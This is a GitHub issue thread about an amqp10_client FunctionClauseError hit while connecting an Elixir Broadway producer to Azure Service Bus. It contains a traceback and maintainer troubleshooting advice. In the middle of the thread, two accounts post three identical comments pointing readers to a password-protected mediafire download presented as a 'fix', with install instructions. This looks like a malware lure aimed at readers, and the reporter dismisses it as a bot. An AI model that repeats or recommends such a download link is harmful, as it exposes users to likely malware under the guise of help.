### ISSUE TITLE
FunctionClauseError AMQP10 Client connection

### ISSUE THREAD

**Issue by rhblind** [highmobility/off_broadway_amqp10#109]
Hello,
I'm trying to use this library to connect to Microsoft Azure Service Bus, but the producer crashes with this message.

**Traceback**
```
[debug] Elixir.OffBroadwayAmqp10.Producer:#PID<0.1329.0> Command: open connection
[warning] AMQP 1.0 connection socket was closed, connection state: 'expecting_frame_header'
[error] GenStateMachine #PID<0.1331.0> terminating
** (FunctionClauseError) no function clause matching in :amqp10_client_connection.sasl_hdr_sent/3
    (amqp10_client 3.12.14) amqp10_client_connection.erl:209: :amqp10_client_connection.sasl_hdr_sent(:info, {:DOWN, #R
eference<0.1652754877.2966945794.21825>, :process, #PID<0.1332.0>, :normal}, {:state, 1, #PID<0.1330.0>, #Reference<0.1
652754877.2966945794.21825>, #PID<0.1333.0>, [], #PID<0.1332.0>, {:tcp, #Port<0.53>}, :undefined, :undefined, %{notify:
 #PID<0.1329.0>, port: 5671, address: ~c"my-service.servicebus.windows.net", sasl: {:plaintext, <<101, 100,
 65, 99, ...>>}, hostname: "my-service.servicebus.windows.net", transfer_limit_margin: 100, tls_opts: [], max_frame
_size: 1048576, notify_when_opened: #PID<0.1329.0>, notify_when_closed: #PID<0.1329.0>}})
    (stdlib 5.2) gen_statem.erl:1395: :gen_statem.loop_state_callback/11
    (stdlib 5.2) proc_lib.erl:241: :proc_lib.init_p_do_apply/3
State: {:sasl_hdr_sent, {:state, 1, #PID<0.1330.0>, #Reference<0.1652754877.2966945794.21825>, #PID<0.1333.0>, [], #PID
<0.1332.0>, {:tcp, #Port<0.53>}, :undefined, :undefined, %{notify: #PID<0.1329.0>, port: 5671, address: ~c"my-service.servicebus.windows.net", sasl: {:plaintext, <<114, 101, 100, ...>>}, hostname: "my-service.servicebus.windows.net", transfer_limit_margin: 100, tls_opts: [], max_frame_size: 1048576, notify_when_opened: #PID<0.1329.0>, notify_wh
en_closed: #PID<0.1329.0>}}}
Callback mode: :state_functions
Postponed events: []
Last event: {:info, {:DOWN, #Reference<0.1652754877.2966945794.21825>, :process, #PID<0.1332.0>, :normal}}
```

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rhblind** [comment]
Thanks, bot.

**Comment by slashmili** [comment]
Seems like that it doesn't match with any of arguments [sasl_hdr_sent](https://github.com/rabbitmq/rabbitmq-server/blob/main/deps/amqp10_client/src/amqp10_client_connection.erl#L204-L209)

amqp10_client doesn't expect to receive `:DOWN` in this stage. I think it's better to create a sample code just using `amqp10_client` and report it to https://github.com/rabbitmq/rabbitmq-server

**Comment by scudelletti** [comment]
It could be a configuration issue.

It seems it's failing to open the connection, usually the steps are:
* open connection
* connection opened
* begin session
* session begun
* attach
* attached

It may be a long shot but have you tried filling the `tls_opts` and double checking the config?

**Comment by scudelletti** [comment]
I'm closing this issue, in case you still have problems please feel free to open a new one.
